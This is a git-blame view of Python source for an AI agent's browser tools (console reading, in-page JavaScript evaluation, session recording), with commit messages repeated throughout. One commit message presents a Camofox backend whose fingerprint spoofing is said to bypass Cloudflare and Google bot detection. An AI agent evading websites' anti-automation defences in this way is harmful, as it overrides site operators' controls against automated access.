2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
if result . get ( " success " ) :
return json . dumps ( {
" success " : True ,
" pressed " : key
} , ensure_ascii = False )
else :
return json . dumps ( {
" success " : False ,
" error " : result . get ( " error " , f " Failed to press { key } " )
} , ensure_ascii = False )
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
2026-01-29 06:10:24 +00:00
2026-04-05 12:42:52 -07:00
def browser_console ( clear : bool = False , expression : Optional [ str ] = None , task_id : Optional [ str ] = None ) - > str :
""" Get browser console messages and JavaScript errors, or evaluate JS in the page.
2026-03-14 11:34:31 -07:00
2026-04-05 12:42:52 -07:00
When ` ` expression ` ` is provided , evaluates JavaScript in the page context
( like the DevTools console ) and returns the result . Otherwise returns
console output ( log / warn / error / info ) and uncaught exceptions .
2026-03-14 11:34:31 -07:00
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
Args :
clear : If True , clear the message / error buffers after reading
2026-04-05 12:42:52 -07:00
expression : JavaScript expression to evaluate in the page context
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
task_id : Task identifier for session isolation
2026-03-14 11:34:31 -07:00
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
Returns :
2026-04-05 12:42:52 -07:00
JSON string with console messages / errors , or eval result
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
"""
2026-04-05 12:42:52 -07:00
# --- JS evaluation mode ---
if expression is not None :
return _browser_eval ( expression , task_id )
# --- Console output mode (original behaviour) ---
feat(browser): add Camofox local anti-detection browser backend (#4008)
Camofox-browser is a self-hosted Node.js server wrapping Camoufox
(Firefox fork with C++ fingerprint spoofing). When CAMOFOX_URL is set,
all 11 browser tools route through the Camofox REST API instead of
the agent-browser CLI.
Maps 1:1 to the existing browser tool interface:
- Navigate, snapshot, click, type, scroll, back, press, close
- Get images, vision (screenshot + LLM analysis)
- Console (returns empty with note — camofox limitation)
Setup: npm start in camofox-browser dir, or docker run -p 9377:9377
Then: CAMOFOX_URL=http://localhost:9377 in ~/.hermes/.env
Advantages over Browserbase (cloud):
- Free (no per-session API costs)
- Local (zero network latency for browser ops)
- Anti-detection at C++ level (bypasses Cloudflare/Google bot detection)
- Works offline, Docker-ready
Files:
- tools/browser_camofox.py: Full REST backend (~400 lines)
- tools/browser_tool.py: Routing at each tool function
- hermes_cli/config.py: CAMOFOX_URL env var entry
- tests/tools/test_browser_camofox.py: 20 tests
2026-03-30 13:18:42 -07:00
if _is_camofox_mode ( ) :
from tools . browser_camofox import camofox_console
return camofox_console ( clear , task_id )
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
effective_task_id = task_id or " default "
2026-03-14 11:34:31 -07:00
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
console_args = [ " --clear " ] if clear else [ ]
error_args = [ " --clear " ] if clear else [ ]
2026-03-14 11:34:31 -07:00
console_result = _run_browser_command ( effective_task_id , " console " , console_args )
errors_result = _run_browser_command ( effective_task_id , " errors " , error_args )
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
messages = [ ]
if console_result . get ( " success " ) :
for msg in console_result . get ( " data " , { } ) . get ( " messages " , [ ] ) :
messages . append ( {
" type " : msg . get ( " type " , " log " ) ,
" text " : msg . get ( " text " , " " ) ,
" source " : " console " ,
} )
2026-03-14 11:34:31 -07:00
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
errors = [ ]
if errors_result . get ( " success " ) :
for err in errors_result . get ( " data " , { } ) . get ( " errors " , [ ] ) :
errors . append ( {
" message " : err . get ( " message " , " " ) ,
" source " : " exception " ,
} )
2026-03-14 11:34:31 -07:00
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
return json . dumps ( {
" success " : True ,
" console_messages " : messages ,
" js_errors " : errors ,
" total_messages " : len ( messages ) ,
" total_errors " : len ( errors ) ,
} , ensure_ascii = False )
2026-04-05 12:42:52 -07:00
def _browser_eval ( expression : str , task_id : Optional [ str ] = None ) - > str :
""" Evaluate a JavaScript expression in the page context and return the result. """
if _is_camofox_mode ( ) :
return _camofox_eval ( expression , task_id )
effective_task_id = task_id or " default "
result = _run_browser_command ( effective_task_id , " eval " , [ expression ] )
if not result . get ( " success " ) :
err = result . get ( " error " , " eval failed " )
# Detect backend capability gaps and give the model a clear signal
if any ( hint in err . lower ( ) for hint in ( " unknown command " , " not supported " , " not found " , " no such command " ) ) :
return json . dumps ( {
" success " : False ,
" error " : f " JavaScript evaluation is not supported by this browser backend. { err } " ,
} )
return json . dumps ( {
" success " : False ,
" error " : err ,
} )
data = result . get ( " data " , { } )
raw_result = data . get ( " result " )
# The eval command returns the JS result as a string. If the string
# is valid JSON, parse it so the model gets structured data.
parsed = raw_result
if isinstance ( raw_result , str ) :
try :
parsed = json . loads ( raw_result )
except ( json . JSONDecodeError , ValueError ) :
pass # keep as string
return json . dumps ( {
" success " : True ,
" result " : parsed ,
" result_type " : type ( parsed ) . __name__ ,
} , ensure_ascii = False , default = str )
def _camofox_eval ( expression : str , task_id : Optional [ str ] = None ) - > str :
""" Evaluate JS via Camofox ' s /tabs/ {tab_id} /eval endpoint (if available). """
from tools . browser_camofox import _get_session , _ensure_tab , _post
try :
session = _get_session ( task_id or " default " )
tab_id = _ensure_tab ( session )
resp = _post ( f " /tabs/ { tab_id } /eval " , json_data = { " expression " : expression } )
# Camofox returns the result in a JSON envelope
raw_result = resp . get ( " result " ) if isinstance ( resp , dict ) else resp
parsed = raw_result
if isinstance ( raw_result , str ) :
try :
parsed = json . loads ( raw_result )
except ( json . JSONDecodeError , ValueError ) :
pass
return json . dumps ( {
" success " : True ,
" result " : parsed ,
" result_type " : type ( parsed ) . __name__ ,
} , ensure_ascii = False , default = str )
except Exception as e :
error_msg = str ( e )
# Graceful degradation — server may not support eval
if any ( code in error_msg for code in ( " 404 " , " 405 " , " 501 " ) ) :
return json . dumps ( {
" success " : False ,
" error " : " JavaScript evaluation is not supported by this Camofox server. "
" Use browser_snapshot or browser_vision to inspect page state. " ,
} )
refactor: add tool_error/tool_result helpers + read_raw_config, migrate 129 callsites
Add three reusable helpers to eliminate pervasive boilerplate:
tools/registry.py — tool_error() and tool_result():
Every tool handler returns JSON strings. The pattern
json.dumps({"error": msg}, ensure_ascii=False) appeared 106 times,
and json.dumps({"success": False, "error": msg}, ...) another 23.
Now: tool_error(msg) or tool_error(msg, success=False).
tool_result() handles arbitrary result dicts:
tool_result(success=True, data=payload) or tool_result(some_dict).
hermes_cli/config.py — read_raw_config():
Lightweight YAML reader that returns the raw config dict without
load_config()'s deep-merge + migration overhead. Available for
callsites that just need a single config value.
Migration (129 callsites across 32 files):
- tools/: browser_camofox (18), file_tools (10), homeassistant (8),
web_tools (7), skill_manager (7), cronjob (11), code_execution (4),
delegate (5), send_message (4), tts (4), memory (7), session_search (3),
mcp (2), clarify (2), skills_tool (3), todo (1), vision (1),
browser (1), process_registry (2), image_gen (1)
- plugins/memory/: honcho (9), supermemory (9), hindsight (8),
holographic (7), openviking (7), mem0 (7), byterover (6), retaindb (2)
- agent/: memory_manager (2), builtin_memory_provider (1)
2026-04-07 13:36:20 -07:00
return tool_error ( error_msg , success = False )
2026-04-05 12:42:52 -07:00
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
def _maybe_start_recording ( task_id : str ) :
""" Start recording if browser.record_sessions is enabled in config. """
if task_id in _recording_sessions :
return
try :
2026-04-07 17:28:04 -07:00
from hermes_cli . config import read_raw_config
2026-04-03 12:32:10 -07:00
hermes_home = get_hermes_home ( )
2026-04-07 17:28:04 -07:00
cfg = read_raw_config ( )
record_enabled = cfg . get ( " browser " , { } ) . get ( " record_sessions " , False )
2026-03-14 11:34:31 -07:00
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
if not record_enabled :
return
2026-03-14 11:34:31 -07:00
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
recordings_dir = hermes_home / " browser_recordings "
recordings_dir . mkdir ( parents = True , exist_ok = True )
_cleanup_old_recordings ( max_age_hours = 72 )
2026-03-14 11:34:31 -07:00
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
import time
timestamp = time . strftime ( " % Y % m %d _ % H % M % S " )
2026-03-14 11:34:31 -07:00
recording_path = recordings_dir / f " session_ { timestamp } _ { task_id [ : 16 ] } .webm "
result = _run_browser_command ( task_id , " record " , [ " start " , str ( recording_path ) ] )
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
